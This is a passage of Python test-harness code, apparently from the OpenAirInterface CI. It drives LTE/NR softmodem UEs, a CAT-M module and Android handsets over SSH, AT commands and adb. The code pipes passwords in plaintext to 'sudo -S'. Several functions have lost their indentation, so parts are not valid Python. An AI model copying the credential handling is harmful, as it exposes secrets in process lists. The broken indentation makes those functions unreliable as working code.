    SSH.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log', '\$', 5)
    self.UELogFile = 'ue_' + self.testCase_id + '.log'

    # We are now looping several times to hope we really sync w/ an eNB
    doOutterLoop = True
    outterLoopCounter = 5
    gotSyncStatus = True
    fullSyncStatus = True
    while (doOutterLoop):
        SSH.command('cd ' + self.UESourceCodePath + '/cmake_targets/ran_build/build', '\$', 5)
        SSH.command('echo ' + self.UEPassword + ' | sudo -S rm -Rf ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log', '\$', 5)
        SSH.command('echo $USER; nohup sudo -E ./my-lte-uesoftmodem-run' + str(self.UE_instance) + '.sh' + ' > ' + self.UESourceCodePath + '/cmake_targets/ue_' + self.testCase_id + '.log ' + ' 2>&1 &', self.UEUserName, 5)
        time.sleep(6)
        SSH.command('cd ../..', '\$', 5)
        doLoop = True
        loopCounter = 10
        gotSyncStatus = True
        # the 'got sync' message is for the UE threads synchronization
        while (doLoop):
            loopCounter = loopCounter - 1
            if (loopCounter == 0):
                # Here should never occur
                logging.error('"got sync" message never showed!')
                gotSyncStatus = False
                doLoop = False
                continue
            SSH.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync"', '\$', 4)
            if self.air_interface == 'nr-uesoftmodem':
                result = re.search('Starting sync detection', SSH.getBefore())
            else:
                result = re.search('got sync', SSH.getBefore())
            if result is None:
                time.sleep(10)
            else:
                doLoop = False
                logging.debug('Found "got sync" message!')
        if gotSyncStatus == False:
            # we certainly need to stop the lte-uesoftmodem process if it is still running!
            SSH.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
            result = re.search('-uesoftmodem', SSH.getBefore())
            if result is not None:
                SSH.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT -r *-uesoftmodem', '\$', 4)
                time.sleep(3)
            outterLoopCounter = outterLoopCounter - 1
            if (outterLoopCounter == 0):
                doOutterLoop = False
            continue
        # We are now checking if sync w/ eNB DOES NOT OCCUR
        # Usually during the cell synchronization stage, the UE returns with No cell synchronization message
        # That is the case for LTE
        # In NR case, it's a positive message that will show if synchronization occurs
        doLoop = True
        if self.air_interface == 'nr-uesoftmodem':
            loopCounter = 10
        else:
            # We are now checking if sync w/ eNB DOES NOT OCCUR
            # Usually during the cell synchronization stage, the UE returns with No cell synchronization message
            loopCounter = 10
        while (doLoop):
            loopCounter = loopCounter - 1
            if (loopCounter == 0):
                if self.air_interface == 'nr-uesoftmodem':
                    # Here we do have great chances that UE did NOT cell-sync w/ gNB
                    doLoop = False
                    fullSyncStatus = False
                    logging.debug('Never seen the NR-Sync message (Measured Carrier Frequency) --> try again')
                    time.sleep(6)
                    # Stopping the NR-UE
                    SSH.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
                    result = re.search('nr-uesoftmodem', SSH.getBefore())
                    if result is not None:
                        SSH.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT nr-uesoftmodem', '\$', 4)
                    time.sleep(6)
                else:
                    # Here we do have a great chance that the UE did cell-sync w/ eNB
                    doLoop = False
                    doOutterLoop = False
                    fullSyncStatus = True
                continue
            SSH.command('stdbuf -o0 cat ue_' + self.testCase_id + '.log | egrep --text --color=never -i "wait|sync|Frequency"', '\$', 4)
            if self.air_interface == 'nr-uesoftmodem':
                # Positive messaging -->
                result = re.search('Measured Carrier Frequency', SSH.getBefore())
                if result is not None:
                    doLoop = False
                    doOutterLoop = False
                    fullSyncStatus = True
                else:
                    time.sleep(6)
            else:
                # Negative messaging -->
                result = re.search('No cell synchronization found', SSH.getBefore())
                if result is None:
                    time.sleep(6)
                else:
                    doLoop = False
                    fullSyncStatus = False
                    logging.debug('Found: "No cell synchronization" message! --> try again')
                    time.sleep(6)
                    SSH.command('ps -aux | grep --text --color=never softmodem | grep -v grep', '\$', 4)
                    result = re.search('lte-uesoftmodem', SSH.getBefore())
                    if result is not None:
                        SSH.command('echo ' + self.UEPassword + ' | sudo -S killall --signal=SIGINT lte-uesoftmodem', '\$', 4)
        outterLoopCounter = outterLoopCounter - 1
        if (outterLoopCounter == 0):
            doOutterLoop = False

    if fullSyncStatus and gotSyncStatus:
        # Decide whether the oaitun tunnel interface should exist in this config.
        doInterfaceCheck = False
        if self.air_interface == 'lte-uesoftmodem':
            result = re.search('--no-L2-connect', str(self.Initialize_OAI_UE_args))
            if result is None:
                doInterfaceCheck = True
        # For the moment, only in explicit noS1 without kernel module (ie w/ tunnel interface)
        if self.air_interface == 'nr-uesoftmodem':
            result = re.search('--noS1 --nokrnmod 1', str(self.Initialize_OAI_UE_args))
            if result is not None:
                doInterfaceCheck = True
        if doInterfaceCheck:
            # Run twice — presumably to refresh the pexpect buffer before
            # matching on the output; confirm before simplifying.
            SSH.command('ifconfig oaitun_ue1', '\$', 4)
            SSH.command('ifconfig oaitun_ue1', '\$', 4)
            # ifconfig output is different between ubuntu 16 and ubuntu 18
            result = re.search('inet addr:1|inet 1', SSH.getBefore())
            if result is not None:
                logging.debug('\u001B[1m oaitun_ue1 interface is mounted and configured\u001B[0m')
                tunnelInterfaceStatus = True
            else:
                logging.debug(SSH.getBefore())
                logging.error('\u001B[1m oaitun_ue1 interface is either NOT mounted or NOT configured\u001B[0m')
                tunnelInterfaceStatus = False
            if RAN.eNBmbmsEnables[0]:
                # MBMS enabled: the second (multicast) tunnel must be up too.
                SSH.command('ifconfig oaitun_uem1', '\$', 4)
                result = re.search('inet addr', SSH.getBefore())
                if result is not None:
                    logging.debug('\u001B[1m oaitun_uem1 interface is mounted and configured\u001B[0m')
                    tunnelInterfaceStatus = tunnelInterfaceStatus and True
                else:
                    logging.error('\u001B[1m oaitun_uem1 interface is either NOT mounted or NOT configured\u001B[0m')
                    tunnelInterfaceStatus = False
        else:
            tunnelInterfaceStatus = True
    else:
        tunnelInterfaceStatus = True
    SSH.close()

    if fullSyncStatus and gotSyncStatus and tunnelInterfaceStatus:
        HTML.CreateHtmlTestRow(self.air_interface + ' ' + self.Initialize_OAI_UE_args, 'OK', CONST.ALL_PROCESSES_OK, 'OAI UE')
        logging.debug('\u001B[1m Initialize OAI UE Completed\u001B[0m')
        if (self.ADBIPAddress != 'none'):
            # Register the softmodem as the single "device" under test.
            self.UEDevices = []
            self.UEDevices.append('OAI-UE')
            self.UEDevicesStatus = []
            self.UEDevicesStatus.append(CONST.UE_STATUS_DETACHED)
    else:
        if self.air_interface == 'lte-uesoftmodem':
            if RAN.eNBmbmsEnables[0]:
                HTML.htmlUEFailureMsg='oaitun_ue1/oaitun_uem1 interfaces are either NOT mounted or NOT configured'
            else:
                HTML.htmlUEFailureMsg='oaitun_ue1 interface is either NOT mounted or NOT configured'
            HTML.CreateHtmlTestRow(self.air_interface + ' ' + self.Initialize_OAI_UE_args, 'KO', CONST.OAI_UE_PROCESS_NO_TUNNEL_INTERFACE, 'OAI UE')
        else:
            HTML.htmlUEFailureMsg='nr-uesoftmodem did NOT synced'
            HTML.CreateHtmlTestRow(self.air_interface + ' ' + self.Initialize_OAI_UE_args, 'KO', CONST.OAI_UE_PROCESS_COULD_NOT_SYNC, 'OAI UE')
        logging.error('\033[91mInitialize OAI UE Failed! \033[0m')
        self.AutoTerminateUEandeNB()
def checkDevTTYisUnlocked(self):
    """Poll the ADB host (up to 5 attempts, 5 s apart) until no picocom
    process is holding /dev/ttyUSB0, then close the SSH session."""
    SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
    for _attempt in range(5):
        SSH.command('echo ' + self.ADBPassword + ' | sudo -S lsof | grep ttyUSB0', '\$', 10)
        if re.search('picocom', SSH.getBefore()) is None:
            break
        time.sleep(5)
    SSH.close()
	def InitializeCatM(self):
		"""Power up and configure the CAT-M module over its serial console.

		Opens a picocom session on /dev/ttyUSB0 via the ADB bench machine, resets
		the module, disables the radio (AT+CFUN=0) and ensures auto-attach is
		enabled.  Writes an 'OK' HTML row and waits for the tty lock release.
		"""
		if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
			HELP.GenericHelp(CONST.Version)
			sys.exit('Insufficient Parameter')
		SSH.enablePicocomClosure()
		SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
		# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
		SSH.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
		SSH.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
		time.sleep(1)
		# Calling twice AT to clear all buffers
		SSH.command('AT', 'OK|ERROR', 5)
		SSH.command('AT', 'OK', 5)
		# Doing a power cycle
		SSH.command('AT^RESET', 'SIMSTORE,READY', 15)
		SSH.command('AT', 'OK|ERROR', 5)
		SSH.command('AT', 'OK', 5)
		# ATE1 turns command echo on so the expected answers can be matched
		SSH.command('ATE1', 'OK', 5)
		# Disabling the Radio
		SSH.command('AT+CFUN=0', 'OK', 5)
		logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
		# Checking if auto-attach is enabled
		SSH.command('AT^AUTOATT?', 'OK', 5)
		result = re.search('AUTOATT: (?P<state>[0-9\-]+)', SSH.getBefore())
		if result is not None:
			if result.group('state') is not None:
				autoAttachState = int(result.group('state'))
				if autoAttachState is not None:
					if autoAttachState == 0:
						# auto-attach was off: enable it for the later attach step
						SSH.command('AT^AUTOATT=1', 'OK', 5)
					logging.debug('\u001B[1m Auto-Attach enabled\u001B[0m')
		else:
			logging.debug('\u001B[1;37;41m Could not check Auto-Attach! \u001B[0m')
		# Force closure of picocom but device might still be locked
		SSH.close()
		SSH.disablePicocomClosure()
		HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
		self.checkDevTTYisUnlocked()
def TerminateCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.enablePicocomClosure()
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
SSH.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
SSH.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
SSH.command('AT', 'OK|ERROR', 5)
SSH.command('AT', 'OK', 5)
# Disabling the Radio
SSH.command('AT+CFUN=0', 'OK', 5)
logging.debug('\u001B[1m Cellular Functionality disabled\u001B[0m')
SSH.close()
SSH.disablePicocomClosure()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
self.checkDevTTYisUnlocked()
def AttachCatM(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
SSH.enablePicocomClosure()
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
# dummy call to start a sudo session. The picocom command does NOT handle well the `sudo -S`
SSH.command('echo ' + self.ADBPassword + ' | sudo -S ls', '\$', 10)
SSH.command('sudo picocom --baud 921600 --flow n --databits 8 /dev/ttyUSB0', 'Terminal ready', 10)
time.sleep(1)
# Calling twice AT to clear all buffers
SSH.command('AT', 'OK|ERROR', 5)
SSH.command('AT', 'OK', 5)
# Enabling the Radio
SSH.command('AT+CFUN=1', 'SIMSTORE,READY', 5)
logging.debug('\u001B[1m Cellular Functionality enabled\u001B[0m')
time.sleep(4)
# We should check if we register
count = 0
attach_cnt = 0
attach_status = False
while count < 5:
SSH.command('AT+CEREG?', 'OK', 5)
result = re.search('CEREG: 2,(?P<state>[0-9\-]+),', SSH.getBefore())
if result is not None:
mDataConnectionState = int(result.group('state'))
if mDataConnectionState is not None:
if mDataConnectionState == 1:
count = 10
attach_status = True
result = re.search('CEREG: 2,1,"(?P<networky>[0-9A-Z]+)","(?P<networkz>[0-9A-Z]+)"', SSH.getBefore())
if result is not None:
networky = result.group('networky')
networkz = result.group('networkz')
logging.debug('\u001B[1m CAT-M module attached to eNB (' + str(networky) + '/' + str(networkz) + ')\u001B[0m')
else:
logging.debug('\u001B[1m CAT-M module attached to eNB\u001B[0m')
else:
logging.debug('+CEREG: 2,' + str(mDataConnectionState))
attach_cnt = attach_cnt + 1
else:
logging.debug(SSH.getBefore())
attach_cnt = attach_cnt + 1
count = count + 1
time.sleep(1)
if attach_status:
SSH.command('AT+CESQ', 'OK', 5)
result = re.search('CESQ: 99,99,255,255,(?P<rsrq>[0-9]+),(?P<rsrp>[0-9]+)', SSH.getBefore())
if result is not None:
nRSRQ = int(result.group('rsrq'))
nRSRP = int(result.group('rsrp'))
if (nRSRQ is not None) and (nRSRP is not None):
logging.debug(' RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB')
logging.debug(' RSRP = ' + str(-140+nRSRP) + ' dBm')
SSH.close()
SSH.disablePicocomClosure()
html_queue = SimpleQueue()
self.checkDevTTYisUnlocked()
if attach_status:
html_cell = '<pre style="background-color:white">CAT-M module Attachment Completed in ' + str(attach_cnt+4) + ' seconds'
if (nRSRQ is not None) and (nRSRP is not None):
html_cell += '\n RSRQ = ' + str(-20+(nRSRQ/2)) + ' dB'
html_cell += '\n RSRP = ' + str(-140+nRSRP) + ' dBm</pre>'
else:
html_cell += '</pre>'
html_queue.put(html_cell)
HTML.CreateHtmlTestRowQueue('N/A', 'OK', 1, html_queue)
else:
logging.error('\u001B[1m CAT-M module Attachment Failed\u001B[0m')
html_cell = '<pre style="background-color:white">CAT-M module Attachment Failed</pre>'
html_queue.put(html_cell)
HTML.CreateHtmlTestRowQueue('N/A', 'KO', 1, html_queue)
self.AutoTerminateUEandeNB()
	def PingCatM(self):
		"""Ping the CAT-M module's allocated IP address from the EPC host.

		The module IP is recovered from the ltebox SPGW log (only the ltebox EPC
		flavor is implemented).  Packet loss and RTT min/avg/max are logged and
		pushed into an HTML result row; loss above self.ping_packetloss_threshold
		fails the step and triggers AutoTerminateUEandeNB().
		"""
		if EPC.IPAddress == '' or EPC.UserName == '' or EPC.Password == '' or EPC.SourceCodePath == '':
			HELP.GenericHelp(CONST.Version)
			sys.exit('Insufficient Parameter')
		check_eNB = True
		check_OAI_UE = False
		pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
		if (pStatus < 0):
			HTML.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
			self.AutoTerminateUEandeNB()
			return
		try:
			statusQueue = SimpleQueue()
			lock = Lock()
			SSH.open(EPC.IPAddress, EPC.UserName, EPC.Password)
			SSH.command('cd ' + EPC.SourceCodePath, '\$', 5)
			SSH.command('cd scripts', '\$', 5)
			# ltebox EPC only: the xGw log records the IPv4 address it allocated
			if re.match('OAI', EPC.Type, re.IGNORECASE):
				logging.debug('Using the OAI EPC HSS: not implemented yet')
				HTML.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
				HTML.CreateHtmlTabFooter(False)
				sys.exit(1)
			else:
				SSH.command('egrep --color=never "Allocated ipv4 addr" /opt/ltebox/var/log/xGwLog.0', '\$', 5)
				result = re.search('Allocated ipv4 addr: (?P<ipaddr>[0-9\.]+) from Pool', SSH.getBefore())
				if result is not None:
					moduleIPAddr = result.group('ipaddr')
				else:
					HTML.CreateHtmlTestRow(self.ping_args, 'KO', pStatus)
					self.AutoTerminateUEandeNB()
					return
			# SSH timeout = ping count ("-c <n>") plus a 50% safety margin
			ping_time = re.findall("-c (\d+)",str(self.ping_args))
			device_id = 'catm'
			ping_status = SSH.command('stdbuf -o0 ping ' + self.ping_args + ' ' + str(moduleIPAddr) + ' 2>&1 | stdbuf -o0 tee ping_' + self.testCase_id + '_' + device_id + '.log', '\$', int(ping_time[0])*1.5)
			# TIMEOUT CASE
			if ping_status < 0:
				message = 'Ping with UE (' + str(moduleIPAddr) + ') crashed due to TIMEOUT!'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				SSH.close()
				self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
				return
			# parse the ping summary line for packet loss
			result = re.search(', (?P<packetloss>[0-9\.]+)% packet loss, time [0-9\.]+ms', SSH.getBefore())
			if result is None:
				message = 'Packet Loss Not Found!'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				SSH.close()
				self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
				return
			packetloss = result.group('packetloss')
			if float(packetloss) == 100:
				message = 'Packet Loss is 100%'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				SSH.close()
				self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
				return
			# parse the rtt statistics line
			result = re.search('rtt min\/avg\/max\/mdev = (?P<rtt_min>[0-9\.]+)\/(?P<rtt_avg>[0-9\.]+)\/(?P<rtt_max>[0-9\.]+)\/[0-9\.]+ ms', SSH.getBefore())
			if result is None:
				message = 'Ping RTT_Min RTT_Avg RTT_Max Not Found!'
				logging.debug('\u001B[1;37;41m ' + message + ' \u001B[0m')
				SSH.close()
				self.ping_iperf_wrong_exit(lock, moduleIPAddr, device_id, statusQueue, message)
				return
			rtt_min = result.group('rtt_min')
			rtt_avg = result.group('rtt_avg')
			rtt_max = result.group('rtt_max')
			pal_msg = 'Packet Loss : ' + packetloss + '%'
			min_msg = 'RTT(Min)    : ' + rtt_min + ' ms'
			avg_msg = 'RTT(Avg)    : ' + rtt_avg + ' ms'
			max_msg = 'RTT(Max)    : ' + rtt_max + ' ms'
			lock.acquire()
			logging.debug('\u001B[1;37;44m ping result (' + moduleIPAddr + ') \u001B[0m')
			logging.debug('\u001B[1;34m    ' + pal_msg + '\u001B[0m')
			logging.debug('\u001B[1;34m    ' + min_msg + '\u001B[0m')
			logging.debug('\u001B[1;34m    ' + avg_msg + '\u001B[0m')
			logging.debug('\u001B[1;34m    ' + max_msg + '\u001B[0m')
			qMsg = pal_msg + '\n' + min_msg + '\n' + avg_msg + '\n' + max_msg
			packetLossOK = True
			if packetloss is not None:
				if float(packetloss) > float(self.ping_packetloss_threshold):
					qMsg += '\nPacket Loss too high'
					logging.debug('\u001B[1;37;41m Packet Loss too high \u001B[0m')
					packetLossOK = False
				elif float(packetloss) > 0:
					# non-zero but below threshold: warn, do not fail
					qMsg += '\nPacket Loss is not 0%'
					logging.debug('\u001B[1;30;43m Packet Loss is not 0% \u001B[0m')
			lock.release()
			SSH.close()
			html_cell = '<pre style="background-color:white">CAT-M module\nIP Address  : ' + moduleIPAddr + '\n' + qMsg + '</pre>'
			statusQueue.put(html_cell)
			if (packetLossOK):
				HTML.CreateHtmlTestRowQueue(self.ping_args, 'OK', 1, statusQueue)
			else:
				HTML.CreateHtmlTestRowQueue(self.ping_args, 'KO', 1, statusQueue)
				self.AutoTerminateUEandeNB()
		except:
			# worker convention in this file: any failure signals the parent
			os.kill(os.getppid(),signal.SIGUSR1)
	def AttachUE_common(self, device_id, statusQueue, lock, idx):
		"""Worker: switch one UE's radio on and poll until it attaches.

		Polls `dumpsys telephony.registry` (up to 45 s) for
		mDataConnectionState == 2 (CONNECTED).  Pushes the triple
		(elapsed-or--1, device_id, message) onto statusQueue under lock.
		Retries by toggling airplane mode when 15 and 30 attempts remain.
		On any exception the parent process is signalled with SIGUSR1.
		"""
		try:
			SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
			if self.ADBCentralized:
				#RH quick add on to integrate cots control defined by yaml
				#if device Id exists in yaml dictionary, we execute the new procedure defined in cots_ue class
				#otherwise we use the legacy procedure
				if COTS_UE.Check_Exists(device_id):
					#switch device to Airplane mode OFF (ie Radio ON)
					COTS_UE.Set_Airplane(device_id, 'OFF')
				elif device_id == '84B7N16418004022':
					# this particular handset needs the root wrapper around the toggle script
					SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
				else:
					SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
			else:
				# airplane mode off // radio on
				SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
			time.sleep(2)
			max_count = 45
			count = max_count
			while count > 0:
				if self.ADBCentralized:
					SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "dumpsys telephony.registry" | grep -m 1 mDataConnectionState', '\$', 15)
				else:
					SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' \'adb -s ' + device_id + ' shell "dumpsys telephony.registry"\' | grep -m 1 mDataConnectionState', '\$', 60)
				result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', SSH.getBefore())
				if result is None:
					logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
					lock.acquire()
					statusQueue.put(-1)
					statusQueue.put(device_id)
					statusQueue.put('mDataConnectionState Not Found!')
					lock.release()
					break
				mDataConnectionState = int(result.group('state'))
				if mDataConnectionState == 2:
					# 2 == DATA_CONNECTED: report how many polls it took
					logging.debug('\u001B[1mUE (' + device_id + ') Attach Completed\u001B[0m')
					lock.acquire()
					statusQueue.put(max_count - count)
					statusQueue.put(device_id)
					statusQueue.put('Attach Completed')
					lock.release()
					break
				count = count - 1
				if count == 15 or count == 30:
					# still not attached: toggle airplane mode off/on as a retry
					logging.debug('\u001B[1;30;43m Retry UE (' + device_id + ') Flight Mode Off \u001B[0m')
					if self.ADBCentralized:
						#RH quick add on to intgrate cots control defined by yaml
						#if device id exists in yaml dictionary, we execute the new procedure defined in cots_ue class
						#otherwise we use the legacy procedure
						if COTS_UE.Check_Exists(device_id):
							#switch device to Airplane mode ON (ie Radio OFF)
							COTS_UE.Set_Airplane(device_id, 'ON')
						elif device_id == '84B7N16418004022':
							SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
						else:
							SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
					else:
						SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
					time.sleep(0.5)
					if self.ADBCentralized:
						#RH quick add on to integrate cots control defined by yaml
						#if device id exists in yaml dictionary, we execute the new procedre defined incots_ue class
						#otherwise we use the legacy procedure
						if COTS_UE.Check_Exists(device_id):
							#switch device to Airplane mode OFF (ie Radio ON)
							COTS_UE.Set_Airplane(device_id, 'OFF')
						elif device_id == '84B7N16418004022':
							SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/on"', '\$', 60)
						else:
							SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/on', '\$', 60)
					else:
						SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOnCmd[idx], '\$', 60)
					time.sleep(0.5)
				logging.debug('\u001B[1mWait UE (' + device_id + ') a second until mDataConnectionState=2 (' + str(max_count-count) + ' times)\u001B[0m')
				time.sleep(1)
			if count == 0:
				logging.debug('\u001B[1;37;41m UE (' + device_id + ') Attach Failed \u001B[0m')
				lock.acquire()
				statusQueue.put(-1)
				statusQueue.put(device_id)
				statusQueue.put('Attach Failed')
				lock.release()
			SSH.close()
		except:
			# worker convention in this file: any failure signals the parent
			os.kill(os.getppid(),signal.SIGUSR1)
	def AttachUE(self):
		"""Attach all (or the first nbMaxUEtoAttach) registered UEs in parallel.

		Spawns one AttachUE_common worker process per device.  Workers report
		triples (count, device_id, message) on status_queue; count < 0 marks a
		failure.  On success the device statuses flip to UE_STATUS_ATTACHED and
		an 'OK' HTML row is written; otherwise the test is torn down.
		"""
		if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
			HELP.GenericHelp(CONST.Version)
			sys.exit('Insufficient Parameter')
		check_eNB = True
		check_OAI_UE = False
		pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
		if (pStatus < 0):
			HTML.CreateHtmlTestRow('N/A', 'KO', pStatus)
			self.AutoTerminateUEandeNB()
			return
		multi_jobs = []
		status_queue = SimpleQueue()
		lock = Lock()
		nb_ue_to_connect = 0
		for device_id in self.UEDevices:
			# nbMaxUEtoAttach == -1 means "attach every device"
			if (self.nbMaxUEtoAttach == -1) or (nb_ue_to_connect < self.nbMaxUEtoAttach):
				self.UEDevicesStatus[nb_ue_to_connect] = CONST.UE_STATUS_ATTACHING
				p = Process(target = self.AttachUE_common, args = (device_id, status_queue, lock,nb_ue_to_connect,))
				p.daemon = True
				p.start()
				multi_jobs.append(p)
				nb_ue_to_connect = nb_ue_to_connect + 1
		for job in multi_jobs:
			job.join()
		if (status_queue.empty()):
			# no worker reported anything: treat as global failure
			HTML.CreateHtmlTestRow('N/A', 'KO', CONST.ALL_PROCESSES_OK)
			self.AutoTerminateUEandeNB()
			return
		else:
			attach_status = True
			html_queue = SimpleQueue()
			while (not status_queue.empty()):
				# each worker pushed exactly three items: count, device, message
				count = status_queue.get()
				if (count < 0):
					attach_status = False
				device_id = status_queue.get()
				message = status_queue.get()
				if (count < 0):
					html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + '</pre>'
				else:
					html_cell = '<pre style="background-color:white">UE (' + device_id + ')\n' + message + ' in ' + str(count + 2) + ' seconds</pre>'
				html_queue.put(html_cell)
			if (attach_status):
				cnt = 0
				while cnt < len(self.UEDevices):
					if self.UEDevicesStatus[cnt] == CONST.UE_STATUS_ATTACHING:
						self.UEDevicesStatus[cnt] = CONST.UE_STATUS_ATTACHED
					cnt += 1
				HTML.CreateHtmlTestRowQueue('N/A', 'OK', len(self.UEDevices), html_queue)
				# when the eNB runs with the T tracer, give the record file time to flush
				result = re.search('T_stdout', str(RAN.Initialize_eNB_args))
				if result is not None:
					logging.debug('Waiting 5 seconds to fill up record file')
					time.sleep(5)
			else:
				HTML.CreateHtmlTestRowQueue('N/A', 'KO', len(self.UEDevices), html_queue)
				self.AutoTerminateUEandeNB()
def DetachUE_common(self, device_id, idx):
try:
SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
if self.ADBCentralized:
#RH quick add on to integrate cots control defined by yaml
#if device id exists in yaml dictionary, we execute the new procedure defined in cots_ue class
#otherwise we use the legacy procedure
if COTS_UE.Check_Exists(device_id):
#switch device to Airplane mode ON (ie Radio OFF)
COTS_UE.Set_Airplane(device_id,'ON')
elif device_id == '84B7N16418004022':
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell "su - root -c /data/local/tmp/off"', '\$', 60)
else:
SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell /data/local/tmp/off', '\$', 60)
else:
SSH.command('ssh ' + self.UEDevicesRemoteUser[idx] + '@' + self.UEDevicesRemoteServer[idx] + ' ' + self.UEDevicesOffCmd[idx], '\$', 60)
logging.debug('\u001B[1mUE (' + device_id + ') Detach Completed\u001B[0m')
SSH.close()
except:
os.kill(os.getppid(),signal.SIGUSR1)
def DetachUE(self):
if self.ADBIPAddress == '' or self.ADBUserName == '' or self.ADBPassword == '':
HELP.GenericHelp(CONST.Version)
sys.exit('Insufficient Parameter')
check_eNB = True
check_OAI_UE = False
pStatus = self.CheckProcessExist(check_eNB, check_OAI_UE)
if (pStatus < 0):
HTML.CreateHtmlTestRow('N/A', 'KO', pStatus)
self.AutoTerminateUEandeNB()
return
multi_jobs = []
cnt = 0
for device_id in self.UEDevices:
self.UEDevicesStatus[cnt] = CONST.UE_STATUS_DETACHING
p = Process(target = self.DetachUE_common, args = (device_id,cnt,))
p.daemon = True
p.start()
multi_jobs.append(p)
cnt += 1
for job in multi_jobs:
job.join()
HTML.CreateHtmlTestRow('N/A', 'OK', CONST.ALL_PROCESSES_OK)
result = re.search('T_stdout', str(RAN.Initialize_eNB_args))
if result is not None:
logging.debug('Waiting 5 seconds to fill up record file')
time.sleep(5)
cnt = 0
while cnt < len(self.UEDevices):
self.UEDevicesStatus[cnt] = CONST.UE_STATUS_DETACHED
cnt += 1
	def RebootUE_common(self, device_id):
		"""Worker: reboot one UE via adb and wait for it to come back.

		Records mDataConnectionState before the reboot, then polls (up to 180 s
		after a fixed 60 s grace period) until the state is readable again and,
		if the UE was connected before, until it is connected again.
		On any exception the parent process is signalled with SIGUSR1.
		"""
		try:
			SSH.open(self.ADBIPAddress, self.ADBUserName, self.ADBPassword)
			previousmDataConnectionStates = []
			# Save mDataConnectionState
			# NOTE(review): the command is issued twice — presumably to flush the
			# adb/ssh output buffer before parsing; confirm before removing.
			SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
			SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
			result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', SSH.getBefore())
			if result is None:
				logging.debug('\u001B[1;37;41m mDataConnectionState Not Found! \u001B[0m')
				sys.exit(1)
			previousmDataConnectionStates.append(int(result.group('state')))
			# Reboot UE
			SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell reboot', '\$', 10)
			time.sleep(60)
			previousmDataConnectionState = previousmDataConnectionStates.pop(0)
			count = 180
			while count > 0:
				count = count - 1
				SSH.command('stdbuf -o0 adb -s ' + device_id + ' shell dumpsys telephony.registry | grep mDataConnectionState', '\$', 15)
				result = re.search('mDataConnectionState.*=(?P<state>[0-9\-]+)', SSH.getBefore())
